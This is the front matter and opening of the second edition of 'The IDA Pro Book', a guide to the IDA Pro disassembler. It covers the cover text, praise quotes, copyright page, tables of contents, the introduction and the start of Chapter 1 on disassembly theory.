No.Starch.The.IDA.Pro.Book.The.Unofficial.Guide.To.The.Worlds.Most.Popular.Disassembler.2nd.Edition.Jul.2011.ISBN.1593272898

User Manual:

Open the PDF directly: View PDF .
Page Count: 676 [warning: Documents this large are best viewed by clicking the View PDF Link!]

Copyright
Dedication
Brief Contents
Contents in Detail
Acknowledgments
Introduction
PART I: Introduction to IDA
PART II: Basic IDA Usage
PART III: Advanced IDA Usage
PART IV: Extending IDA's Capabilities
PART V: Real-World Applications
PART VI: The IDA Debugger
A: Using IDA Freeware 5.0
- Restrictions on IDA Freeware
- Using IDA Freeware
B: IDC/SDK Cross-Reference
Index

JMP

EBP

SUB

T H E

I D A P R O

B O O K

T H E

I D A P R O

B O O K

T H E U N O F F I C I A L G U I D E T O T H E

W O R L D ’ S M O S T P O P U L A R D I S A S S E M B L E R

C H R I S E A G L E

2 N D

ED I T ION

“I wholeheartedly recommend The

IDA Pro Book to all IDA Pro users.”

—Ilfak Guilfanov,

creator of IDA Pro

www.nostarch.com

TH E F I N EST IN G E EK E N T E R TA IN M ENT™

SHELVE IN:

PROGRAMMING/

SOFTWARE DEVELOPMENT

$69.95 ($79.95 CDN)

I D A P R O

D E - O B F U S C A T E D

I D A P R O

D E - O B F U S C A T E D

No source code? No problem. With IDA Pro, the inter-

active disassembler, you live in a source code–optional

world. IDA can automatically analyze the millions of

opcodes that make up an executable and present you

with a disassembly. But at that point, your work is just

beginning. With The IDA Pro Book, you’ll learn how

to turn that mountain of mnemonics into something you

can actually use.

Hailed by the creator of IDA Pro as “profound, compre-

hensive, and accurate,” the second edition of The IDA

Pro Book covers everything from the very ﬁrst steps to

advanced automation techniques. You’ll ﬁnd complete

coverage of IDA’s new Qt-based user interface, as

well as increased coverage of the IDA debugger, the

Bochs debugger, and IDA scripting (especially using

IDAPython). But because humans are still smarter than

computers, you’ll even learn how to use IDA’s latest

interactive and scriptable interfaces to your advantage.

Save time and effort as you learn to:

• Navigate, comment, and modify disassembly

• Identify known library routines, so you can focus your

analysis on other areas of the code

• Use code graphing to quickly make sense of cross-

references and function calls

• Extend IDA to support new processors and ﬁletypes

using the SDK

• Explore popular plug-ins that make writing IDA scripts

easier, allow collaborative reverse engineering, and

much more

• Use IDA’s built-in debugger to tackle hostile and

obfuscated code

Whether you’re analyzing malware, conducting vulnerabil-

ity research, or reverse engineering software, a mastery

of IDA Pro is crucial to your success. Take your skills to the

next level with this 2nd edition of The IDA Pro Book.

A B O U T T H E A U T H O R

Chris Eagle is a Senior Lecturer of Computer Science

at the Naval Postgraduate School in Monterey, CA.

He is the author of many IDA plug-ins and co-author of

Gray Hat Hacking (McGraw-Hill), and he has spoken

at numerous security conferences, including Blackhat,

Defcon, Toorcon, and Shmoocon.

JMP

EBP

SUB

“I L I E F L A T.”

This book uses a lay-ﬂat binding that won’t sna p shut.

JMP

SUB

E A G L E

T H E I D A P R O B O O K

2 N D E D I T I O N

PRAISE FOR THE FIRST EDITION OF THE IDA PRO BOOK

“I wholeheartedly recommend The IDA Pro Book to all IDA Pro users.”

—ILFAK GUILFANOV, CREATOR OF IDA PRO

“A very concise, well laid out book. . . . The step by step examples, and much

needed detail of all aspects of IDA alone make this book a good choice.”

—CODY PIERCE, TIPPINGPOINT DVLABS

“Chris Eagle is clearly an excellent educator, as he makes the sometimes very

dense and technically involved material easy to read and understand and also

chooses his examples well.”

—DINO DAI ZOVI, TRAIL OF BITS BLOG

“Provides a significantly better understanding not of just IDA Pro itself, but

of the entire RE process.”

—RYAN LINN, THE ETHICAL HACKER NETWORK

“This book has no fluff or filler, it’s solid information!”

—ERIC HULSE, CARNAL0WNAGE BLOG

“The densest, most accurate, and, by far, the best IDA Pro book ever

released.”

—PIERRE VANDEVENNE, OWNER AND CEO OF DATARESCUE SA

“I highly recommend this book to anyone, from the person looking to begin

using IDA Pro to the seasoned veteran.”

—DUSTIN D. TRAMMELL, SECURITY RESEARCHER

“This book does definitely get a strong buy recommendation from me. It’s

well written and it covers IDA Pro more comprehensively than any other

written document I am aware of (including the actual IDA Pro Manual).”

—SEBASTIAN PORST, SENIOR SOFTWARE SECURITY ENGINEER, MICROSOFT

“Whether you need to solve a tough runtime defect or examine your

application security from the inside out, IDA Pro is a great tool and this book

is THE guide for coming up to speed.”

—JOE STAGNER, PROGRAM MANAGER, MICROSOFT

THE IDA PRO BOOK

2ND EDITION

The Unofficial Guide to the

World’s Most Popular

Disassembler

by Chris Eagle

San Francisco

mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior

written permission of the copyright owner and the publisher.

Printed in Canada

15 14 13 12 11 1 2 3 4 5 6 7 8 9

ISBN-10: 1-59327-289-8

ISBN-13: 978-1-59327-289-0

Publisher: William Pollock

Production Editor: Alison Law

Cover and Interior Design: Octopod Studios

Developmental Editor: Tyler Ortman

Technical Reviewer: Tim Vidas

Copyeditor: Linda Recktenwald

Compositor: Alison Law

Proofreader: Paula L. Fleming

Indexer: BIM Indexing & Proofreading Services

For information on book distributors or translations, please contact No Starch Press, Inc. directly:

No Starch Press, Inc.

38 Ringold Street, San Francisco, CA 94103

phone: 415.863.9900; fax: 415.863.9950; info@nostarch.com; www.nostarch.com

The Library of Congress has cataloged the first edition as follows:

Eagle, Chris.

The IDA Pro book : the unofficial guide to the world's most popular disassembler / Chris Eagle.

p. cm.

Includes bibliographical references and index.

ISBN-13: 978-1-59327-178-7

ISBN-10: 1-59327-178-6

1. IDA Pro (Electronic resource) 2. Disassemblers (Computer programs) 3. Debugging in computer science. I.

Title.

QA76.76.D57E245 2008

005.1'4--dc22

2008030632

No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and

company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark

symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the

benefit of the trademark owner, with no intention of infringement of the trademark.

The information in this book is distributed on an “As Is” basis, without warranty. While every precaution has been

taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any

person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the

information contained in it.

This book is dedicated to my mother.

BRIEF CONTENTS

Acknowledgments.........................................................................................................xix

Introduction ..................................................................................................................xxi

PART I: INTRODUCTION TO IDA

Chapter 1: Introduction to Disassembly..............................................................................3

Chapter 2: Reversing and Disassembly Tools....................................................................15

Chapter 3: IDA Pro Background......................................................................................31

PART II: BASIC IDA USAGE

Chapter 4: Getting Started with IDA................................................................................43

Chapter 5: IDA Data Displays.........................................................................................59

Chapter 6: Disassembly Navigation................................................................................79

Chapter 7: Disassembly Manipulation ...........................................................................101

Chapter 8: Datatypes and Data Structures......................................................................127

Chapter 9: Cross-References and Graphing....................................................................167

Chapter 10: The Many Faces of IDA .............................................................................189

PART III: ADVANCED IDA USAGE

Chapter 11: Customizing IDA.......................................................................................201

Chapter 12: Library Recognition Using FLIRT Signatures...................................................211

Chapter 13: Extending IDA’s Knowledge.......................................................................227

Chapter 14: Patching Binaries and Other IDA Limitations.................................................237

viii Brief Contents

PART IV: EXTENDING IDA’S CAPABILITIES

Chapter 15: IDA Scripting............................................................................................249

Chapter 16: The IDA Software Development Kit..............................................................285

Chapter 17: The IDA Plug-in Architecture .......................................................................315

Chapter 18: Binary Files and IDA Loader Modules..........................................................347

Chapter 19: IDA Processor Modules..............................................................................377

PART V: REAL-WORLD APPLICATIONS

Chapter 20: Compiler Personalities...............................................................................415

Chapter 21: Obfuscated Code Analysis.........................................................................433

Chapter 22: Vulnerability Analysis................................................................................475

Chapter 23: Real-World IDA Plug-ins.............................................................................499

PART VI: THE IDA DEBUGGER

Chapter 24: The IDA Debugger....................................................................................513

Chapter 25: Disassembler/Debugger Integration............................................................539

Chapter 26: Additional Debugger Features....................................................................569

Appendix A: Using IDA Freeware 5.0 ...........................................................................581

Appendix B: IDC/SDK Cross-Reference..........................................................................585

Index.........................................................................................................................609

CONTENTS IN DETAIL

ACKNOWLEDGMENTS xix

INTRODUCTION xxi

PART I

INTRODUCTION TO IDA

INTRODUCTION TO DISASSEMBLY 3

Disassembly Theory................................................................................................... 4

The What of Disassembly........................................................................................... 5

The Why of Disassembly............................................................................................ 6

Malware Analysis ........................................................................................ 6

Vulnerability Analysis ................................................................................... 6

Software Interoperability............................................................................... 7

Compiler Validation ..................................................................................... 7

Debugging Displays ..................................................................................... 7

The How of Disassembly............................................................................................ 7

A Basic Disassembly Algorithm...................................................................... 8

Linear Sweep Disassembly ............................................................................ 9

Recursive Descent Disassembly .................................................................... 11

Summary................................................................................................................ 14

REVERSING AND DISASSEMBLY TOOLS 15

Classification Tools.................................................................................................. 16

file ........................................................................................................... 16

PE Tools.................................................................................................... 18

PEiD ......................................................................................................... 19

Summary Tools ....................................................................................................... 20

nm ........................................................................................................... 20

ldd........................................................................................................... 22

objdump................................................................................................... 23

otool......................................................................................................... 24

dumpbin ................................................................................................... 25

c++filt....................................................................................................... 25

Deep Inspection Tools.............................................................................................. 27

strings....................................................................................................... 27

Disassemblers............................................................................................ 28

Summary................................................................................................................ 29

xContents in Detail

IDA PRO BACKGROUND 31

Hex-Rays’ Stance on Piracy ...................................................................................... 32

Obtaining IDA Pro................................................................................................... 33

IDA Versions.............................................................................................. 33

IDA Licenses.............................................................................................. 33

Purchasing IDA.......................................................................................... 34

Upgrading IDA.......................................................................................... 34

IDA Support Resources............................................................................................. 35

Your IDA Installation................................................................................................ 36

Windows Installation.................................................................................. 36

OS X and Linux Installation.......................................................................... 37

IDA and SELinux ........................................................................................ 38

32-bit vs. 64-bit IDA .................................................................................. 38

The IDA Directory Layout............................................................................. 38

Thoughts on IDA’s User Interface............................................................................... 40

Summary................................................................................................................ 40

PART II

BASIC IDA USAGE

GETTING STARTED WITH IDA 43

Launching IDA ........................................................................................................ 44

IDA File Loading ........................................................................................ 45

Using the Binary File Loader........................................................................ 47

IDA Database Files.................................................................................................. 48

IDA Database Creation............................................................................... 50

Closing IDA Databases............................................................................... 51

Reopening a Database ............................................................................... 52

Introduction to the IDA Desktop................................................................................. 53

Desktop Behavior During Initial Analysis .................................................................... 56

IDA Desktop Tips and Tricks ..................................................................................... 57

Reporting Bugs ....................................................................................................... 58

Summary................................................................................................................ 58

IDA DATA DISPLAYS 59

The Principal IDA Displays........................................................................................ 60

The Disassembly Window ........................................................................... 60

The Functions Window ............................................................................... 66

The Output Window................................................................................... 66

Secondary IDA Displays........................................................................................... 66

The Hex View Window............................................................................... 67

The Exports Window .................................................................................. 68

The Imports Window .................................................................................. 68

Contents in Detail xi

The Structures Window............................................................................... 69

The Enums Window.................................................................................... 70

Tertiary IDA Displays............................................................................................... 70

The Strings Window................................................................................... 70

The Names Window .................................................................................. 72

The Segments Window............................................................................... 74

The Signatures Window.............................................................................. 74

The Type Libraries Window......................................................................... 75

The Function Calls Window......................................................................... 76

The Problems Window................................................................................ 76

Summary................................................................................................................ 77

DISASSEMBLY NAVIGATION 79

Basic IDA Navigation.............................................................................................. 80

Double-Click Navigation............................................................................. 80

Jump to Address......................................................................................... 82

Navigation History..................................................................................... 82

Stack Frames.......................................................................................................... 83

Calling Conventions ................................................................................... 85

Local Variable Layout ................................................................................. 89

Stack Frame Examples................................................................................ 89

IDA Stack Views......................................................................................... 93

Searching the Database........................................................................................... 98

Text Searches ............................................................................................ 99

Binary Searches......................................................................................... 99

Summary.............................................................................................................. 100

DISASSEMBLY MANIPULATION 101

Names and Naming.............................................................................................. 102

Parameters and Local Variables ................................................................. 102

Named Locations..................................................................................... 103

Commenting in IDA............................................................................................... 106

Regular Comments ................................................................................... 107

Repeatable Comments.............................................................................. 107

Anterior and Posterior Lines....................................................................... 108

Function Comments .................................................................................. 108

Basic Code Transformations ................................................................................... 108

Code Display Options .............................................................................. 109

Formatting Instruction Operands................................................................. 112

Manipulating Functions............................................................................. 113

Converting Data to Code (and Vice Versa).................................................. 119

Basic Data Transformations .................................................................................... 120

Specifying Data Sizes............................................................................... 121

Working with Strings................................................................................ 122

Specifying Arrays..................................................................................... 124

Summary.............................................................................................................. 126

xii Contents in Detail

DATATYPES AND DATA STRUCTURES 127

Recognizing Data Structure Use .............................................................................. 130

Array Member Access .............................................................................. 130

Structure Member Access.......................................................................... 135

Creating IDA Structures.......................................................................................... 142

Creating a New Structure (or Union) .......................................................... 142

Editing Structure Members......................................................................... 144

Stack Frames as Specialized Structures....................................................... 146

Using Structure Templates....................................................................................... 146

Importing New Structures....................................................................................... 149

Parsing C Structure Declarations ................................................................ 149

Parsing C Header Files ............................................................................. 150

Using Standard Structures ...................................................................................... 151

IDA TIL Files.......................................................................................................... 154

Loading New TIL Files............................................................................... 155

Sharing TIL Files....................................................................................... 155

C++ Reversing Primer............................................................................................ 156

The this Pointer ........................................................................................ 156

Virtual Functions and Vtables..................................................................... 157

The Object Life Cycle................................................................................ 160

Name Mangling ...................................................................................... 162

Runtime Type Identification........................................................................ 163

Inheritance Relationships........................................................................... 164

C++ Reverse Engineering References.......................................................... 165

Summary.............................................................................................................. 166

CROSS-REFERENCES AND GRAPHING 167

Cross-References................................................................................................... 168

Code Cross-References ............................................................................. 169

Data Cross-References .............................................................................. 171

Cross-Reference Lists................................................................................. 173

Function Calls.......................................................................................... 175

IDA Graphing....................................................................................................... 176

IDA External (Third-Party) Graphing............................................................ 176

IDA’s Integrated Graph View..................................................................... 185

Summary.............................................................................................................. 187

THE MANY FACES OF IDA 189

Console Mode IDA................................................................................................ 190

Common Features of Console Mode........................................................... 190

Windows Console Specifics ...................................................................... 191

Linux Console Specifics............................................................................. 192

OS X Console Specifics ............................................................................ 194

Using IDA’s Batch Mode........................................................................................ 196

Summary.............................................................................................................. 198

Contents in Detail xiii

PART III

ADVANCED IDA USAGE

CUSTOMIZING IDA 201

Configuration Files ................................................................................................ 201

The Main Configuration File: ida.cfg .......................................................... 202

The GUI Configuration File: idagui.cfg........................................................ 203

The Console Configuration File: idatui.cfg................................................... 206

Additional IDA Configuration Options ..................................................................... 207

IDA Colors .............................................................................................. 207

Customizing IDA Toolbars......................................................................... 208

Summary.............................................................................................................. 210

LIBRARY RECOGNITION USING FLIRT SIGNATURES 211

Fast Library Identification and Recognition Technology............................................... 212

Applying FLIRT Signatures ...................................................................................... 212

Creating FLIRT Signature Files ................................................................................. 216

Signature-Creation Overview..................................................................... 217

Identifying and Acquiring Static Libraries .................................................... 217

Creating Pattern Files................................................................................ 219

Creating Signature Files............................................................................ 221

Startup Signatures.................................................................................... 224

Summary.............................................................................................................. 225

EXTENDING IDA’S KNOWLEDGE 227

Augmenting Function Information ............................................................................ 228

IDS Files.................................................................................................. 230

Creating IDS Files..................................................................................... 231

Augmenting Predefined Comments with loadint......................................................... 233

Summary.............................................................................................................. 235

PATCHING BINARIES AND OTHER IDA LIMITATIONS 237

The Infamous Patch Program Menu.......................................................................... 238

Changing Individual Database Bytes .......................................................... 238

Changing a Word in the Database ............................................................ 239

Using the Assemble Dialog........................................................................ 239

IDA Output Files and Patch Generation.................................................................... 241

IDA-Generated MAP Files.......................................................................... 242

IDA-Generated ASM Files.......................................................................... 242

IDA-Generated INC Files........................................................................... 243

IDA-Generated LST Files............................................................................ 243

IDA-Generated EXE Files ........................................................................... 243

xiv Contents in Detail

IDA-Generated DIF Files............................................................................ 244

IDA-Generated HTML Files......................................................................... 245

Summary.............................................................................................................. 245

PART IV

EXTENDING IDA’S CAPABILITIES

IDA SCRIPTING 249

Basic Script Execution............................................................................................ 250

The IDC Language................................................................................................. 252

IDC Variables.......................................................................................... 252

IDC Expressions....................................................................................... 253

IDC Statements ........................................................................................ 254

IDC Functions .......................................................................................... 254

IDC Objects ............................................................................................ 256

IDC Programs.......................................................................................... 257

Error Handling in IDC............................................................................... 258

Persistent Data Storage in IDC ................................................................... 259

Associating IDC Scripts with Hotkeys....................................................................... 261

Useful IDC Functions.............................................................................................. 261

Functions for Reading and Modifying Data.................................................. 262

User Interaction Functions.......................................................................... 263

String-Manipulation Functions .................................................................... 264

File Input/Output Functions........................................................................ 264

Manipulating Database Names ................................................................. 266

Functions Dealing with Functions................................................................ 266

Code Cross-Reference Functions................................................................. 267

Data Cross-Reference Functions.................................................................. 268

Database Manipulation Functions............................................................... 268

Database Search Functions........................................................................ 269

Disassembly Line Components ................................................................... 270

IDC Scripting Examples.......................................................................................... 270

Enumerating Functions .............................................................................. 270

Enumerating Instructions............................................................................ 271

Enumerating Cross-References.................................................................... 272

Enumerating Exported Functions................................................................. 275

Finding and Labeling Function Arguments ................................................... 275

Emulating Assembly Language Behavior ..................................................... 278

IDAPython............................................................................................................ 280

Using IDAPython...................................................................................... 281

IDAPython Scripting Examples ................................................................................ 282

Enumerating Functions .............................................................................. 282

Enumerating Instructions............................................................................ 282

Enumerating Cross-References.................................................................... 283

Enumerating Exported Functions................................................................. 283

Summary.............................................................................................................. 284

Contents in Detail xv

THE IDA SOFTWARE DEVELOPMENT KIT 285

SDK Introduction ................................................................................................... 286

SDK Installation........................................................................................ 287

SDK Layout.............................................................................................. 287

Configuring a Build Environment................................................................ 289

The IDA Application Programming Interface ............................................................. 289

Header Files Overview ............................................................................. 290

Netnodes................................................................................................ 294

Useful SDK Datatypes............................................................................... 302

Commonly Used SDK Functions.................................................................. 304

Iteration Techniques Using the IDA API........................................................ 310

Summary.............................................................................................................. 314

THE IDA PLUG-IN ARCHITECTURE 315

Writing a Plug-in................................................................................................... 316

The Plug-in Life Cycle................................................................................ 318

Plug-in Initialization .................................................................................. 320

Event Notification..................................................................................... 321

Plug-in Execution...................................................................................... 322

Building Your Plug-ins ............................................................................................ 324

Installing Plug-ins................................................................................................... 329

Configuring Plug-ins .............................................................................................. 330

Extending IDC ...................................................................................................... 331

Plug-in User Interface Options................................................................................. 333

Using the SDK’s Chooser Dialogs............................................................... 334

Creating Customized Forms with the SDK.................................................... 337

Windows-Only User Interface–Generation Techniques.................................. 341

User Interface Generation with Qt.............................................................. 342

Scripted Plug-ins.................................................................................................... 344

Summary.............................................................................................................. 346

BINARY FILES AND IDA LOADER MODULES 347

Unknown File Analysis........................................................................................... 348

Manually Loading a Windows PE File...................................................................... 349

IDA Loader Modules.............................................................................................. 358

Writing an IDA Loader Using the SDK ..................................................................... 358

The Simpleton Loader ............................................................................... 361

Building an IDA Loader Module................................................................. 366

A pcap Loader for IDA.............................................................................. 366

Alternative Loader Strategies .................................................................................. 372

Writing a Scripted Loader...................................................................................... 373

Summary.............................................................................................................. 375

xvi Contents in Detail

IDA PROCESSOR MODULES 377

Python Byte Code.................................................................................................. 378

The Python Interpreter............................................................................................ 379

Writing a Processor Module Using the SDK.............................................................. 380

The processor_t Struct............................................................................... 380

Basic Initialization of the LPH Structure........................................................ 381

The Analyzer........................................................................................... 385

The Emulator............................................................................................ 390

The Outputter........................................................................................... 394

Processor Notifications.............................................................................. 399

Other processor_t Members....................................................................... 401

Building Processor Modules.................................................................................... 403

Customizing Existing Processors.............................................................................. 407

Processor Module Architecture................................................................................ 409

Scripting a Processor Module ................................................................................. 411

Summary.............................................................................................................. 412

PART V

REAL-WORLD APPLICATIONS

COMPILER PERSONALITIES 415

Jump Tables and Switch Statements......................................................................... 416

RTTI Implementations ............................................................................................. 420

Locating main....................................................................................................... 421

Debug vs. Release Binaries..................................................................................... 428

Alternative Calling Conventions .............................................................................. 430

Summary.............................................................................................................. 432

OBFUSCATED CODE ANALYSIS 433

Anti–Static Analysis Techniques............................................................................... 434

Disassembly Desynchronization ................................................................. 434

Dynamically Computed Target Addresses.................................................... 437

Imported Function Obfuscation .................................................................. 444

Targeted Attacks on Analysis Tools............................................................. 448

Anti–Dynamic Analysis Techniques.......................................................................... 449

Detecting Virtualization............................................................................. 449

Detecting Instrumentation .......................................................................... 451

Detecting Debuggers ................................................................................ 452

Preventing Debugging .............................................................................. 453

Static De-obfuscation of Binaries Using IDA.............................................................. 454

Script-Oriented De-obfuscation................................................................... 455

Emulation-Oriented De-obfuscation............................................................. 460

Virtual Machine-Based Obfuscation......................................................................... 472

Summary.............................................................................................................. 474

Contents in Detail xvii

VULNERABILITY ANALYSIS 475

Discovering New Vulnerabilities with IDA................................................................. 476

After-the-Fact Vulnerability Discovery with IDA .......................................................... 483

IDA and the Exploit-Development Process................................................................. 488

Stack Frame Breakdown ........................................................................... 488

Locating Instruction Sequences................................................................... 492

Finding Useful Virtual Addresses ................................................................ 494

Analyzing Shellcode.............................................................................................. 495

Summary.............................................................................................................. 498

REAL-WORLD IDA PLUG-INS 499

Hex-Rays.............................................................................................................. 500

IDAPython............................................................................................................ 503

collabREate .......................................................................................................... 503

ida-x86emu.......................................................................................................... 506

Class Informer....................................................................................................... 506

MyNav................................................................................................................ 508

IdaPdf.................................................................................................................. 509

Summary.............................................................................................................. 510

PART VI

THE IDA DEBUGGER

THE IDA DEBUGGER 513

Launching the Debugger ........................................................................................ 514

Basic Debugger Displays........................................................................................ 518

Process Control..................................................................................................... 521

Breakpoints ............................................................................................. 522

Tracing................................................................................................... 526

Stack Traces............................................................................................ 528

Watches ................................................................................................. 529

Automating Debugger Tasks................................................................................... 530

Scripting Debugger Actions....................................................................... 530

Automating Debugger Actions with IDA Plug-ins........................................... 536

Summary.............................................................................................................. 538

DISASSEMBLER/DEBUGGER INTEGRATION 539

Background.......................................................................................................... 540

IDA Databases and the IDA Debugger..................................................................... 541

Debugging Obfuscated Code................................................................................. 543

Launching the Process............................................................................... 545

Simple Decryption and Decompression Loops.............................................. 546

xviii Contents in Detail

Import Table Reconstruction....................................................................... 550

Hiding the Debugger................................................................................ 555

IdaStealth............................................................................................................. 560

Dealing with Exceptions......................................................................................... 561

Summary.............................................................................................................. 568

ADDITIONAL DEBUGGER FEATURES 569

Remote Debugging with IDA................................................................................... 569

Using a Hex-Rays Debugging Server .......................................................... 570

Attaching to a Remote Process................................................................... 573

Exception Handling During Remote Debugging............................................ 574

Using Scripts and Plug-ins During Remote Debugging ................................... 574

Debugging with Bochs........................................................................................... 574

Bochs IDB Mode ...................................................................................... 575

Bochs PE Mode........................................................................................ 576

Bochs Disk Image Mode............................................................................ 577

Appcall................................................................................................................ 578

Summary.............................................................................................................. 579

USING IDA FREEWARE 5.0 581

Restrictions on IDA Freeware .................................................................................. 582

Using IDA Freeware .............................................................................................. 583

IDC/SDK CROSS-REFERENCE 585

INDEX 609

ACKNOWLEDGMENTS

As with the first edition, I would like to thank my family

for putting up with me while I worked on this project.

I am ever grateful for their patience and tolerance.

I would also like to thank everyone who helped make the first edition

a success, in particular the readers who I hope have found it to be a useful

addition to their reverse engineering libraries. Without your support and

many kind words, this edition would never have been possible.

Once again I wish to thank my technical editor Tim Vidas for all of his

input over the course of this project, as well as his wife Sheila for allowing me

to borrow him a second time.

Thanks also to the developers at Hex-Rays, not only for the product you

have built but also for putting up with my “bug” reports, too many of which

turned out to be false alarms. Ilfak, you have as usual been more than gen-

erous with your time; Elias, Igor, and Daniel, you have all provided insights

that I could have obtained nowhere else. Together you all make IDA my

favorite piece of software.

Finally, I would like to thank Alison Law and everyone else at No Starch

Press for their hard work in keeping this version of the book moving along as

smoothly as I could ever have hoped.

JMP

EBP

SUB

INTRODUCTION

Writing a book about IDA Pro is a challeng-

ing task. The fact that it is a complex piece

of software with more features than can even

be mentioned, let alone detailed in a book of

reasonable size, is the least of the difficulties. New

releases of IDA also tend to occur frequently enough

that any book will almost certainly be one, if not two,

versions behind by the time it hits the streets. Including version 5.3, which

was released just as the first edition was going to press, seven new versions of

IDA have been released since the first edition was published. The release of

version 6.0 with a new, Qt-based graphical user interface motivated me to

update the book and address many of the features that have been introduced

in the interim. Of course, true to form, another version of IDA (6.1) was

released late in the process just to make things more exciting.

My goal with this edition remains to help others get started with IDA and

perhaps develop an interest in reverse engineering in general. For anyone

looking to get into the reverse engineering field, I can’t stress how important

xxii Introduction

it is that you develop competent programming skills. Ideally, you should love

code, perhaps going so far as to eat, sleep, and breathe code. If programming

intimidates you, then reverse engineering is probably not for you. It is possible

to argue that reverse engineering requires no programming at all because all

you are doing is taking apart someone else’s program; however, without com-

mitting to developing scripts and plug-ins to help automate your work, you

will never become a truly effective reverse engineer. In my case, programming

and reverse engineering substitute for the challenge of The New York Times

Sunday crossword puzzle, so it is rarely tedious.

For continuity purposes, this edition preserves the overall structure of

the first edition while elaborating and adding material where appropriate.

There are a number of ways to read this book. Users with little reverse engi-

neering background may wish to begin with Chapters 1 and 2 for some

background information on reverse engineering and disassemblers. Users

without much IDA experience who are looking to dive right in can begin

with Chapter 3, which discusses the basic layout of an IDA installation, while

Chapter 4 covers what goes on when you launch IDA and load a file for anal-

ysis. Chapters 5 through 7 discuss IDA’s user interface features and basic

capabilities.

Readers possessing some familiarity with IDA may wish to begin with

Chapter 8, which discusses how to use IDA to deal with complex data struc-

tures, including C++ classes. Chapter 9, in turn, covers IDA cross-references,

which are the foundation for IDA’s graph-based displays (also covered in

Chapter 9). Chapter 10 provides a bit of a diversion useful for readers inter-

ested in running IDA on non-Windows platforms (Linux or OS X).

More advanced IDA users may find Chapters 11 through 14 a good place

to start, because they cover some of the fringe uses of IDA and its companion

tools. A brief run-through of some of IDA’s configuration options is presented

in Chapter 11. Chapter 12 covers IDA’s FLIRT/FLAIR technology and related

tools that are used to develop and utilize signatures to distinguish library code

from application code. Chapter 13 offers some insight into IDA type libraries

and ways to extend them, while Chapter 14 addresses the much-asked ques-

tion of whether IDA can be used to patch binary files.

IDA is a quite capable tool right out of the box; however, one of its

greatest strengths is its extensibility, which users have taken advantage of to

make IDA do some very interesting things over the years. IDA’s extensibility

features are covered in Chapters 15 through 19, which begin with coverage

of IDA’s scripting features, including increased coverage of IDAPython, and

follow with a systematic walk through IDA’s programming API, as provided

by its software development kit (SDK). Chapter 16 provides an overview of

the SDK, while Chapters 17 through 19 walk you through plug-ins, file

loaders, and processor modules.

With the bulk of IDA’s capabilities covered, Chapters 20 through 23

turn to more practical uses of IDA for reverse engineering by examining how

compilers differ (Chapter 20); how IDA may be used to analyze obfuscated

code, as is often encountered when analyzing malware (Chapter 21); and

Introduction xxiii

how IDA may be used in the vulnerability discovery and analysis process

(Chapter 22). Chapter 23 concludes the section by presenting some useful

IDA extensions (plug-ins) that have been published over the years.

The book concludes with expanded coverage of IDA’s built-in debugger

in Chapters 24 through 26. Chapter 24 begins by introducing the basic fea-

tures of the debugger. Chapter 25 discusses some of the challenges of using

the debugger to examine obfuscated code, including the challenge of deal-

ing with any anti-debugging feature that may be present. Chapter 26 concludes

the book with a discussion of IDA’s remote debugging capabilities and the

use of the Bochs emulator as an integrated debugging platform.

At the time of this writing, IDA version 6.1 was the most current version

available, and the book is written largely from a 6.1 perspective. Hex-Rays is

generous enough to make an older version of IDA available for free; the

freeware version of IDA is a reduced-functionality version of IDA 5.0. While

many of the IDA features discussed in the book apply to the freeware version

as well, Appendix A provides a brief rundown of some of the differences a

user of the freeware version can expect to encounter.

Finally, since it is a somewhat natural progression to begin with IDA

scripting and move on to creating compiled plug-ins, Appendix B provides a

complete mapping of every IDC function to its corresponding SDK counter-

parts. In some cases you will find a one-to-one correspondence between

an IDC function and an SDK function (though in all cases the names of

those functions are different); in other cases, you will find that several SDK

function calls are required to implement a single IDC function. The intent

of Appendix B is to answer questions along the lines of “I know how to do X

in IDC, how can I do X with a plug-in?” The information in Appendix B was

obtained by reverse engineering the IDA kernel, which is perfectly legal

under IDA’s atypical licensing agreement.

Throughout the book, I have tried to avoid long sequences of code in

favor of short sequences that demonstrate specific points. The vast majority

of sample code, along with many of the binary files used to generate examples,

is available on the book’s official website, http://www.idabook.com/, where you

will also find additional examples not included in the book as well as a com-

prehensive list of references used throughout the book (such as live links to

all URLs referred in footnotes).

PART I

INTRODUCTION TO IDA

JMP

EBP

SUB

INTRODUCTION TO

DISASSEMBLY

You may be wondering what to expect in

a book dedicated to IDA Pro. While obvi-

ously IDA-centric, this book is not intended

to come across as The IDA Pro User’s Manual.

Instead, we intend to use IDA as the enabling tool

for discussing reverse engineering techniques that you will find useful in ana-

lyzing a wide variety of software, ranging from vulnerable applications to mal-

ware. When appropriate, we will provide detailed steps to be followed in IDA

for performing specific actions related to the task at hand. As a result we will

take a rather roundabout walk through IDA’s capabilities, beginning with

the basic tasks you will want to perform upon initial examination of a file and

leading up to advanced uses and customization of IDA for more challenging

reverse engineering problems. We make no attempt to cover all of IDA’s fea-

tures. We do, however, cover the features that you will find most useful in

meeting your reverse engineering challenges. This book will help make IDA

the most potent weapon in your arsenal of tools.

4Chapter 1

Prior to diving into any IDA specifics, it will be useful to cover some of

the basics of the disassembly process as well as review some other tools

available for reverse engineering of compiled code. While none of these

tools offers the complete range of IDA’s capabilities, each does address specific

subsets of IDA functionality and offer valuable insight into specific IDA fea-

tures. The remainder of this chapter is dedicated to understanding the disas-

sembly process.

Disassembly Theory

Anyone who has spent any time at all studying programming languages has

probably learned about the various generations of languages, but they are

summarized here for those who may have been sleeping.

First-generation languages

These are the lowest form of language, generally consisting of ones and

zeros or some shorthand form such as hexadecimal, and readable only

by binary ninjas. Things are confusing at this level because it is often diffi-

cult to distinguish data from instructions since everything looks pretty

much the same. First-generation languages may also be referred to as

machine languages, and in some cases byte code, while machine language

programs are often referred to as binaries.

Second-generation languages

Also called assembly languages, second-generation languages are a mere

table lookup away from machine language and generally map specific bit

patterns, or operation codes (opcodes), to short but memorable character

sequences called mnemonics. Occasionally these mnemonics actually help

programmers remember the instructions with which they are associated.

An assembler is a tool used by programmers to translate their assembly

language programs into machine language suitable for execution.

Third-generation languages

These languages take another step toward the expressive capability of

natural languages by introducing keywords and constructs that program-

mers use as the building blocks for their programs. Third-generation

languages are generally platform independent, though programs written

using them may be platform dependent as a result of using features

unique to a specific operating system. Often-cited examples include

FORTRAN, COBOL, C, and Java. Programmers generally use compilers

to translate their programs into assembly language or all the way to

machine language (or some rough equivalent such as byte code).

